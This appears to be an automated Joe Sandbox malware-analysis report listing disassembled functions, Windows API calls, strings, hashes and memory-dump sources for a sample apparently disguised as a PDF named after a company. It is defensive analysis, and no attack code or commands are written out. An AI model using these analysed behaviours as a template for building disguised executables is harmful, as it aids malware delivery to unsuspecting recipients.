                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3869813825-0
                                                                                                                      • Opcode ID: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                                                                                                                      • Instruction ID: f1c26ca2a06b741d4f24205fd3c9ed8d5b4ed62bfdfb01bf916816f767346e52
                                                                                                                      • Opcode Fuzzy Hash: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                                                                                                                      • Instruction Fuzzy Hash: 85516D70900709EFDB21DFA8DD89B6EBBF5FF44704F104A29E682A25A0D778E914CB54
                                                                                                                      Function 007DA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007DA4C8
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 007DA542
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA5BC
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA5DE
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA5F1
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 007DA613
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA64A
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA663
                                                                                                                      • GetDesktopWindow.USER32 ref: 007DA67C
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007DA683
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA69B
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA6B3
                                                                                                                        • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                      • Opcode ID: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                                                                                                                      • Instruction ID: 11b2714402fd253fbf0af62c8026dbc57a7f9271379879de12d24506ea59791b
                                                                                                                      • Opcode Fuzzy Hash: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                                                                                                                      • Instruction Fuzzy Hash: A7715A71140205EFD710CF28C849FA67BF9FB88304F08492EF995872A1D779E955CB16
                                                                                                                      Function 007DC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 007DC917
                                                                                                                        • Part of subcall function 007DADF1: ClientToScreen.USER32(?,?), ref: 007DAE1A
                                                                                                                        • Part of subcall function 007DADF1: GetWindowRect.USER32(?,?), ref: 007DAE90
                                                                                                                        • Part of subcall function 007DADF1: PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 007DC980
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC98B
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC9AE
                                                                                                                      • _wcscat.LIBCMT ref: 007DC9DE
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC9F5
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 007DCA0E
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA25
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA47
                                                                                                                      • DragFinish.SHELL32(?), ref: 007DCA4E
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DCB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                      • Opcode ID: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                                                                                                                      • Instruction ID: f127aeeda094f59d1af222c14b7c115540e88c30b2047ac1f1b254d781001faa
                                                                                                                      • Opcode Fuzzy Hash: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                                                                                                                      • Instruction Fuzzy Hash: 30615A71508301AFC701DF64DC89D9BBBF9FF88710F004A2EF596962A1DB789A49CB52
                                                                                                                      Function 007D4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007D46AB
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D46F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                      • Opcode ID: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                                                                                                                      • Instruction ID: 388736a00d7e8ab7cd34d0d0895a6ecfd87f7b49d6c4cd969c18d10c44c917c8
                                                                                                                      • Opcode Fuzzy Hash: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                                                                                                                      • Instruction Fuzzy Hash: C7918C34204701DFCB14EF20C855AAAB7A1AF95354F04886DF9965B3A2CB79FD0ACB91
                                                                                                                      Function 007DBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DBB6E
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007D6D80,?), ref: 007DBBCA
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC03
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DBC46
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC7D
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 007DBC89
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DBC99
                                                                                                                      • DestroyIcon.USER32(?), ref: 007DBCA8
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBCC5
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBCD1
                                                                                                                        • Part of subcall function 0077313D: __wcsicmp_l.LIBCMT ref: 007731C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                      • Opcode ID: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                                                                                                                      • Instruction ID: dba31cae3a5e634bfa514fc1a9e4446207d4492149f31f4d54b8cbf6858185de
                                                                                                                      • Opcode Fuzzy Hash: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                                                                                                                      • Instruction Fuzzy Hash: 4161B171600619FAEB14DF64CC45FBE77B8FB08721F108116F919D62D1DBB8AA90DB60
                                                                                                                      Function 007BA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,007DFB78), ref: 007BA0FC
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 007BA11E
                                                                                                                      • __swprintf.LIBCMT ref: 007BA177
                                                                                                                      • __swprintf.LIBCMT ref: 007BA190
                                                                                                                      • _wprintf.LIBCMT ref: 007BA246
                                                                                                                      • _wprintf.LIBCMT ref: 007BA264
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%~
                                                                                                                      • API String ID: 311963372-3531514502
                                                                                                                      • Opcode ID: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                                                                                                                      • Instruction ID: 54a5c8d3c9ad43912aa65394f23f2675a0629e137153cfa7e3b67b9779da7a04
                                                                                                                      • Opcode Fuzzy Hash: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                                                                                                                      • Instruction Fuzzy Hash: 75517C71900209FACF19EBE0DD8AEEEB779BF04301F104165F805A21A1EB796F59DB61
                                                                                                                      Function 007BA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 007BA636
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 007BA683
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA6CB
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA702
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA730
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                      • Opcode ID: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                                                                                                                      • Instruction ID: 8260efd39adad0c3bd6995d6d910d901cef0e2a96ff99080df74c46aaf77a255
                                                                                                                      • Opcode Fuzzy Hash: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                                                                                                                      • Instruction Fuzzy Hash: 1E512871104304DFC704EF20D8859AAB7B4FF94719F04896DF89697291DB79EE0ACB52
                                                                                                                      Function 007BA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA47A
                                                                                                                      • __swprintf.LIBCMT ref: 007BA49C
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA4D9
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA4FE
                                                                                                                      • _memset.LIBCMT ref: 007BA51D
                                                                                                                      • _wcsncpy.LIBCMT ref: 007BA559
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA58E
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007BA599
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 007BA5A2
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007BA5AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                                                                                                                      • Instruction ID: eecf243ec47967a34e4a39fda1c5db1394a5ff7b633b3cd5dbfc0c2adf8a179f
                                                                                                                      • Opcode Fuzzy Hash: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                                                                                                                      • Instruction Fuzzy Hash: 5631AEB1500219BBDB209FA0DC48FEB37BCEF88741F1080B6F909D2160E77897548B29
                                                                                                                      Function 0078AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 884005220-0
                                                                                                                      • Opcode ID: 3388f37ff00667aec9d97607f970c3d92c95446f3c87af35e57c98e822911fc9
                                                                                                                      • Instruction ID: 69c508369cfff11cc2d5fa7aa2efd9392460dab6716227546227309652e36bee
                                                                                                                      • Opcode Fuzzy Hash: 3388f37ff00667aec9d97607f970c3d92c95446f3c87af35e57c98e822911fc9
                                                                                                                      • Instruction Fuzzy Hash: 1461E4B2A80301FFFB206F24D849B697BA9EF11361F14811BE815DB191EB3D9841C7A2
                                                                                                                      Function 007BDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 007BDC7B
                                                                                                                      • _wcscat.LIBCMT ref: 007BDC93
                                                                                                                      • _wcscat.LIBCMT ref: 007BDCA5
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDCBA
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDCCE
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 007BDCE6
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDD00
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDD12
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      • Opcode ID: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                                                                                                                      • Instruction ID: 10236f58b22e865524a930ea0bffd234cfa1b7aa801403e7c21d0ad300ebd4cc
                                                                                                                      • Opcode Fuzzy Hash: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                                                                                                                      • Instruction Fuzzy Hash: B2816EB16042419FCB34DF64C845AEBB7E8BB88310F19882AF889C7251F678ED45CB52
                                                                                                                      Function 007DC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC4EC
                                                                                                                      • GetFocus.USER32 ref: 007DC4FC
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 007DC507
                                                                                                                      • _memset.LIBCMT ref: 007DC632
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC65D
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 007DC67D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 007DC690
                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC6C4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC70C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC744
                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                      • Opcode ID: 50f01759cc6a2627f041feb44a3a94e8714c517eb5b858784743be7277942eac
                                                                                                                      • Instruction ID: 27de6a99f1002f07cce8533be1a90319b1d23759b4c4341f981da33bbdbe7a1b
                                                                                                                      • Opcode Fuzzy Hash: 50f01759cc6a2627f041feb44a3a94e8714c517eb5b858784743be7277942eac
                                                                                                                      • Instruction Fuzzy Hash: 42817D702083029FD711CF14D984AAABBF8FF88364F14452EF99697391D778E915CBA2
                                                                                                                      Function 007A83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                        • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                        • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                        • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                        • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                                                                                                                        • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                                                                                                                        • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A8458
                                                                                                                      • _memset.LIBCMT ref: 007A846D
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A848C
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A849D
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 007A84DA
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A84F6
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A8513
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8522
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A8529
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A854A
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 007A8551
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8582
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A85A8
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A85BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
